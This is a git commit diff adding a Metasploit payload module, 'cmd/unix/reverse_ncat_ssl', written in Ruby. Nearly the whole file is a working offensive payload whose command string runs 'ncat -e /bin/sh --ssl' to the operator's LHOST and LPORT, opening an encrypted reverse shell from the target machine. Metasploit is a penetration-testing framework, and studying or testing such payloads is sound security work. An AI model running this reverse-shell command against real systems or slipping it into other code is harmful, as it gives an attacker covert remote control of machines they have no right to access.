Land rapid7#8325, cmd/unix/reverse_ncat_ssl payload

wvu · wvu · commit 41ef1a4e904b · 2017-05-01T14:54:52.000-05:00
diff --git a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb
@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP (via ncat)',
+      'Description' => 'Creates an interactive shell via ncat, utilising ssl mode',
+      'Author'      => 'C_Sto',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcpSsl,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'ncat',
+      'Payload'     =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    "ncat -e /bin/sh --ssl #{datastore['LHOST']} #{datastore['LPORT']}"
+  end
+
+end
